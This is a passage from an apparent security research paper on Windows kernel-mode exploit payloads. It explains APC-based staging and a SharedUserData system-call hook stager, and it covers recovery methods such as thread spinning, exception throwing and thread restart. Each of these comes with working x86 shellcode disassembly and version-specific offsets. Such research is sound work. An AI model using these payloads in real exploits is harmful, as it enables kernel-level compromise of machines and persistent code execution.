such as SharedUserData. After the copy has completed, the next step is to locate the thread that the APC should be queued to. There are a few important things to keep in mind in this step. For instance, it is likely the case that the R3 payload will want to be run in the context of a privileged process. As such, a privileged process must first be located and a thread running within it must be found. Secondly, the thread that will have the APC queued to it must be in the alertable state, otherwise the APC insertion will fail. Once a suitable thread has been located, the final step is to initialize the APC and point the APC routine to the user-mode equivalent address via nt!KeInitializeApc and insert it into the thread's APC queue via nt!KeInsertQueueApc. After that has completed, the code will be run in the context of the thread that the APC was queued to and all will be well. One of the major concerns about this type of approach is that it will generally have to rely on undocumented offsets for fields in structures like EPROCESS and ETHREAD that are very volatile across operating system versions. As such, making a portable payload that uses this technique is perfectly feasible, but it may come at the cost of size due to the requirement of factoring in different offsets and detecting the version at runtime. The approach outlined by eEye works perfectly fine and is well thought out, and as such this subsection will merely describe ways in which it might be possible to improve the existing implementation. One way in which it might be optimized would be to eliminate the call to nt!PsLookupProcessByProcessId, but as their paper points out, this would only be possible for vulnerabilities that are triggered outside of the context of the Idle process. However, for cases where this is not a limitation, it would be easier to extract the current thread's process from . This can be accomplished through the following disassembly This may not be safe if the KPRCB is not located immediately after the KPCR: 00000000 A124F1DFFF mov eax,[0xffdff124] 00000005 8B4044 mov eax,[eax+0x44] After the process has been extracted, enumeration to find a privileged system process could be done in exactly the same manner as the paper describes (by enumerating the ActiveProcessLinks). Another improvement that might be made would be to use SharedUserData as a storage location for the initialized KAPC structure rather than allocating storage for it with nt!ExAllocatePool. This would save some space by eliminating the need to resolve and call nt!ExAllocatePool. While the approach outlined in the paper describes nt!ExAllocatePool as being used to stage the payload to an IRQL safe buffer, it would be equally feasible to do so by using nt!SharedUserData for storage. 4.2.3) User-mode Function Pointer Hook If a vulnerability is triggered in the context of a process then the doors open up to a whole wide array of possibilities. For instance, the FastPebLockRoutine could be hooked to call into some code that is present in SharedUserData prior to calling the real lock routine. This is just one example of the different types of function pointers that could be hooked relative to a process. 4.2.4) SharedUserData SystemCall Hook +------------+-----------------+ | Type: | R0 to R3 Stager | | Size: | 68 bytes | | Compat: | XP, 2003 | | Migration: | Not necessary | +------------+-----------------+ One particularly useful approach to staging a R3 payload from R0 is to hijack the system call dispatcher at R3. To accomplish this, one must have an understanding of the basic mechanism through which system calls are dispatched in user-mode. Prior to Windows XP, system calls were dispatched through the soft-interrupt 0x2e. As such, the method described in this subsection will not work on Windows 2000. However, starting with XP SP0, the system call interface was changed to support using processor-specific instructions for system calls, such as sysenter or syscall. To support this, Microsoft added fields to the KUSER_SHARED_DATA structure, which is symbolically known as SharedUserData, that held instructions for issuing a system call. These instructions were placed at offset 0x300 by the kernel and took a form like the code shown below: kd> dt _KUSER_SHARED_DATA 0x7ffe0000 ... +0x300 SystemCall : [4] 0xc819cc3`340fd48b kd> u SharedUserData!SystemCallStub L3 SharedUserData!SystemCallStub: 7ffe0300 8bd4 mov edx,esp 7ffe0302 0f34 sysenter 7ffe0304 c3 ret To make use of this dynamic code block, each system call stub in ntdll.dll was implemented to make a call into the instructions found at that location. ntdll!ZwAllocateVirtualMemory: 77f7e4c3 b811000000 mov eax,0x11 77f7e4c8 ba0003fe7f mov edx,0x7ffe0300 77f7e4cd ffd2 call edx Due to the fact that SharedUserData contained executable instructions, it was thus necessary that the SharedUserData mapping had to be marked as executable. When Microsoft began work on some of the security enhancements included with XP SP2 and 2003 SP1, such as Data Execution Prevention (DEP), they presumably realized that leaving SharedUserData executable was largely unnecessary and that doing so left open the possibility for abuse. To address this, the fields in KUSER_SHARED_DATA were changed from sets of instructions to function pointers that resided within ntdll.dll. The output below shows this change: +0x300 SystemCall : 0x7c90eb8b +0x304 SystemCallReturn : 0x7c90eb94 +0x308 SystemCallPad : [3] 0 To make use of the function pointers, each system call stub was changed to issue an indirect call through the SystemCall function pointer: ntdll!ZwAllocateVirtualMemory: 7c90d4de b811000000 mov eax,0x11 7c90d4e3 ba0003fe7f mov edx,0x7ffe0300 7c90d4e8 ff12 call dword ptr [edx] The importance behind the approaches taken to issue system calls is that it is possible to take advantage of the way in which the system call dispatching interfaces have been implemented. These interfaces can be manipulated in a manner that allows a payload to be staged from R0 to R3 with very little overhead. The basic idea behind this approach is that a R3 payload is layered in between the system call stubs and the kernel. The R3 payload then gets an opportunity to run prior to a system call being issued within the context of an arbitrary process. This approach has quite a few advantages. First, the size of the staging payload is relatively small because it requires no symbol resolution or other means of directly scheduling the execution of code in an arbitrary or specific process. Second, the staging mechanism is inherently IRQL-safe because SharedUserData cannot be paged out. This benefit makes it such that a migration technique does not have to be employed in order to get the R0 payload to a safe IRQL. One of the disadvantages of the payload outlined below is that it relies on SharedUserData being executable. However, it should be trivial to alter the PTE for SharedUserData to set the execute bit if necessary, thus eliminating the DEP concern. Another thing to keep in mind about this stager is that the R3 payload must be written in a manner that allows it to be re-entrant. Since the R3 payload is layered between user-mode and kernel-mode for system call dispatching, it can be assumed that the payload will get called many times in many different process contexts. It is up to the R3 payload to figure out when it should do its magic and when it should not. The following steps outline one way in which a stager of this type could be implemented. 1. Obtain the address of the R3 payload In order to prepare to copy the R3 payload to SharedUserData (or some other globally-accessible region), the address of the R3 payload must be determined in some arbitrary manner. 2. Copy the R3 payload to the global region After obtaining the address of the R3 payload, the next step would be to copy it to a globally accessible region. One such region would be in SharedUserData. This requires that SharedUserData be executable. 3. Determine OS version The method used to layer between system call stubs and the kernel differs between XP SP0/SP1 and XP SP2/2003 SP1. To determine whether or not the machine is XP SP0/SP1, a comparison can be made to see if the first two bytes found at 0xffdf0300 are equal to 0xd48b (which is equivalent to a mov edx, esp instruction). If they are equal, then the operating system is assumed to be XP SP0/SP1. Otherwise, it is assumed to be XP SP2+. 4. Hooking on XP SP0/SP1 If the operating system version is XP SP0/SP1, hooking is accomplished by overwriting the first two bytes at 0xffdf0300 with a short jump instruction to some offset within SharedUserData that is not used, such as 0xffdf037c. Prior to doing this overwrite, a few instructions must be appended to the copied R3 payload that act as a method of restoring execution so that the original system call actually executes. This is accomplished by appending a mov edx, esp / mov ecx, 0x7ffe0302 / jmp ecx instruction set. 5. Hooking on XP SP2+ If the operating system version is XP SP2, hooking is accomplished by overwriting the function pointer found at offset 0x300 within SharedUserData. Prior to overwriting the function pointer, the original function pointer must be saved and an indirect jmp instruction must be appended to the copied R3 payload so that system calls can still be processed. The original function pointer can be saved to 0xffdf0308 which is currently defined as being used for padding. The jmp instruction can therefore indirectly acquire the original system call dispatcher address from 0x7ffe0308. The following code illustrates an implementation of this type of staging payload. It's roughly 68 bytes in size, excluding the R3 payload and the recovery method. 00000000 EB3F jmp short 0x41 00000002 BB0103DFFF mov ebx,0xffdf0301 00000007 4B dec ebx 00000008 FC cld 00000009 8D7B7C lea edi,[ebx+0x7c] 0000000C 5E pop esi 0000000D 57 push edi 0000000E 6A01 push byte +0x1 ; number of dwords to copy 00000010 59 pop ecx 00000011 F3A5 rep movsd 00000013 B88BD4B902 mov eax,0x2b9d48b 00000018 663903 cmp [ebx],ax 0000001B 7511 jnz 0x2e 0000001D AB stosd 0000001E B803FE7FFF mov eax,0xff7ffe03 00000023 AB stosd 00000024 B0E1 mov al,0xe1 00000026 AA stosb 00000027 66C703EB7A mov word [ebx],0x7aeb 0000002C 5F pop edi 0000002D C3 ret ; substitute with recovery method 0000002E 8B03 mov eax,[ebx] 00000030 8D4B08 lea ecx,[ebx+0x8] 00000033 8901 mov [ecx],eax 00000035 66C707FF25 mov word [edi],0x25ff 0000003A 894F02 mov [edi+0x2],ecx 0000003D 5F pop edi 0000003E 893B mov [ebx],edi 00000040 C3 ret ; substitute with recovery method 00000041 E8BCFFFFFF call 0x2 ... R3 payload here ... 4.3) Recovery Another distinction between kernel-mode vulnerabilities and user-mode vulnerabilities is that it is not safe to simply let the kernel crash. If the kernel crashes, the box will blue screen and the payload that was transmitted may not even get a chance to run. As such, it is necessary to identify ways in which normal execution can be resumed after a kernel-mode vulnerability has been triggered. However, like most things in the kernel, the recovery method that can be used is highly dependent on the vulnerability in question, so it makes sense to have a few possible approaches. Chances are, though, that the methods listed in this document will not be enough to satisfy every situation and in many cases may not even be the most optimal. For this reason, kernel-mode exploit writers are encouraged to research more specific recovery methods when implementing an exploit. Regardless of these concerns, this section describes the general class of recovery payloads and identifies scenarios in which they may be most useful. 4.3.1) Thread Spinning For situations where a vulnerability occurs in a non-critical kernel thread, it may be possible to simply cause the thread to spin or block indefinitely. This approach is very useful because it means that there is no requirement to gracefully restore execution in some manner. It basically skirts the issue of recovery altogether. 4.3.1.1) Delaying Thread Execution This method was proposed by eEye and involved using nt!KeDelayExecutionThread as a way of blocking the calling thread without adversely impacting performance. Alternatively, if nt!KeDelayExecutionThread failed or returned, eEye implemented their payload in such a way as to cause it to spin while calling nt!KeYieldExecution each iteration. The approach that eEye suggests is perfectly fine, assuming the following minimum conditions are true: - Non-critical kernel thread - No exclusive locks (such as spin locks) are held by a calling frame If any one of these conditions is not true, the act of spinning or otherwise blocking the thread from continuing normal execution could lead to a deadlock. If the setting is right, though, this method is perfectly acceptable. If the approach described by eEye is used, it will require the resolution of nt!KeDelayExecutionThread at a minimum, but could also require the resolution of nt!KeYieldExecution depending on how robust the recovery method is intended to be. The fact that this requires symbol resolution means that the payload will jump significantly in size if it does not already involve the resolution of symbols. 4.3.1.2) Spinning the Calling Thread +---------------+--------------------+ | Type: | R0 Recovery | | Size: | 2 bytes | | Compat: | All | | Migration: | May be required | | Requirements: | No held locks | +---------------+--------------------+ An alternative approach is to just spin the calling thread at PASSIVE_LEVEL. If the conditions are right, this should not lead to a deadlock, but it is likely that performance will be adversely affected. The benefit is that it does not increase the size of the payload by much considering such an approach can be implemented in two bytes: 00000000 EBFE jmp short 0x0 4.3.2) Throwing an Exception +---------------+---------------------------------+ | Type: | R0 Recovery | | Size: | 3 bytes | | Compat: | All | | Migration: | Not necessary | | Requirements: | No held locks in wrapped frame | +---------------+---------------------------------+ If a vulnerability occurs in the context of a frame that is wrapped in an exception handler, it may be possible to simply trigger an exception that will allow execution to continue like normal. Unfortunately, the chances of this recovery method being usable are very slim considering most vulnerabilities are likely to occur outside of the context of an exception wrapped frame. The usability of this approach can be tested fairly simply by triggering the overflow in such a way as to cause an exception to be thrown. If the machine does not crash, it could be the case that the vulnerability occurred in a function that is wrapped by an exception handler. Assuming this is the case, writing a payload that simply triggers an exception is fairly trivial. 00000000 31F6 xor esi,esi 00000002 AC lodsb 4.3.3) Thread Restart +---------------+---------------------+ | Type: | R0 Recovery | | Size: | 41 bytes | | Compat: | 2000, XP | | Migration: | May be required | | Requirements: | No held locks | +---------------+---------------------+ If a vulnerability occurs in the context of a system worker thread, it may be possible to cause the thread to restart execution at its entry point without any major adverse side effects. This avoids the issue of having to restore normal execution for the context of the current call frame. To accomplish this, the StartAddress must be extracted from the calling thread's ETHREAD structure. Due to the fact that this relies on the use of undocumented fields, it follows that portability could be a problem. The following table shows the offsets to the StartAddress routine for different operating system versions: +------------------+---------------------+----------------------+ | Platform | StartAddress Offset | Stack Restore Offset | +------------------+---------------------+----------------------+ | Windows 2000 SP4 | 0x230 | 0x254 | | Windows XP SP0 | 0x224 | 0x250 | | Windows XP SP2 | 0x224 | 0x250 | +------------------+---------------------+----------------------+ A payload that implements this approach that should be compatible with all of the above described offsets is shown below. Testing was only performed on XP SP0: 00000000 6A24 push byte +0x24 00000002 5B pop ebx 00000003 FEC7 inc bh 00000005 648B13 mov edx,[fs:ebx] 00000008 FEC7 inc bh 0000000A 8B6218 mov esp,[edx+0x18] 0000000D 29DC sub esp,ebx 0000000F 01D3 add ebx,edx 00000011 803D7002DFFF01 cmp byte [0xffdf0270],0x1 00000018 7C07 jl 0x21 0000001A 8B03 mov eax,[ebx] 0000001C 83EC2C sub esp,byte +0x2c 0000001F EB06 jmp short 0x27 00000021 8B430C mov eax,[ebx+0xc] 00000024 83EC30 sub esp,byte +0x30 00000027 FFE0 jmp eax This implementation works by first obtaining the current thread context through fs:0x124. Once obtained, a check is performed to see which operating system the payload is running on by looking at the NtMinorVersion attribute of the KUSER_SHARED_DATA structure. The reason this is necessary is because the offsets needed to obtain the StartAddress of the thread and the offset that is needed when restoring the stack are different depending on which operating system is being used. After resolving the StartAddress and adjusting the stack pointer to reflect what it would have been when the function was originally called, all that's required is to transfer control to the StartAddress. This approach, at least in this specific implementation, may be closely tied to vulnerabilities that occur in system worker thread routines, specifically those that start at nt!ExpWorkerThread. However, the principals could be applied to other system worker threads if the illustrated implementation proves limited. It is also important to realize that since this method depends on undocumented version-specific offsets, it is highly likely that it may not be portable to new versions of the kernel. This approach should also be compatible with Windows 2003 Server SP0/SP1, but the offsets are likely to be different and have not been obtained or tested at this point. 4.3.4) Lock Release Judging from some of the other recovery methods described in this document, it can be seen that one of the biggest limiting factors has to do with locks being held when recovery is attempted. To deal with this problem, one would have to implement a solution that was capable of releasing held locks prior to using a recovery method. This is more of a theoretical solution than a concrete one, but if it were possible to release locks held by a thread prior to recovery, then it would be possible to use some of the more elegant recovery methods. As it stands, though, the authors are not aware of a feasible solution to this problem that is capable of releasing the various types of locks in a general manner. Instead, it would most likely be better to attack this problem on a per-vulnerability basis rather than attempting to come up with an all-encompassing solution. Without a proper lock releasing solution, it is likely that even if a vulnerability can be triggered, the box may deadlock. Again, this is highly dependent on the vulnerability in question, but it's not something that should be considered an academic concern. 4.4) Stages The purpose of the stage payload component is to perform whatever arbitrary task is desired, whether it be to hook the keyboard and send key strokes to the attacker or to spawn a reverse shell in the context of a user-mode process. The definition of the stage component is very broad as to encompass pretty much any end-goal an attacker might have. For that reason, this section is relatively sparse on details and is instead left up to the reader to decide what type of action they would like to perform. The paper eEye has provided shows some concrete examples of kernel-mode stages. There are also many examples of existing user-mode payloads that could be staged to run in the context of a user-mode process. In the future, stages will most likely be the focal point of kernel-mode payload research. 5) Conclusion This document has illustrated some of the general techniques that can be used when implementing kernel-mode payloads. Examples have been provided for techniques that can be used to locate the base address of nt and an example routine has been provided to illustrate symbol resolution. To make kernel-mode payloads easier to grasp, their anatomy has been broken down into four distinct units that have been referred to as payload components. These four payload components can be combined together to form a logical kernel-mode payload. The purpose of the migration payload component is to transition the processor to a safe IRQL so that the rest of the payload can be executed. In some cases, it's also necessary to make use of a stager payload component in order to move the payload to another thread context or location for the purpose of execution. Once the payload is at a safe IRQL and has been staged as necessary, the actual meat of the payload can be run. This portion of the payload is symbolically referred to as the stage payload component. After everything is said and done, the kernel-mode payload has to find some way to ensure that the kernel does not crash. To accomplish this, a situational recovery payload component can be used to allow the kernel to continue to execute properly. While the vectors taken to achieve code execution have not been described in this document, it is expected that there will continue to be research and improvements in this field. A cycle similar to that seen for user-mode vulnerabilities can be equally expected in the kernel-mode arena once enough interest is gained. With the eye of security vendors intently focused on solving the problem of user-mode software vulnerabilities, the kernel-mode arena will be a playground ripe for research and discovery. Bibliography Conover, Matt. Malware Profiling and Rootkit Detection on Windows. http://xcon.xfocus.org/archives/2005/Xcon2005_Shok.pdf; accessed Dec. 12, 2005. eEye Digital Security. Remote Windows Kernel Exploitation: Step into the Ring 0. http://www.eeye.com/ data/publish/whitepapers/research/OT20050205.FILE.pdf; accessed Dec. 8, 2005. skape. Safely Searching Process Virtual Address Space. http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf; accessed Dec. 12, 2005. SoBeIt. How to Exploit Windows Kernel Memory Pool. http://packetstormsecurity.nl/Xcon2005/Xcon2005_SoBeIt.pdf; accessed Dec. 11, 2005. System Inside. Sysenter. http://system-inside.com/driver/sysenter/sysenter.html; accessed Nov. 23, 2005.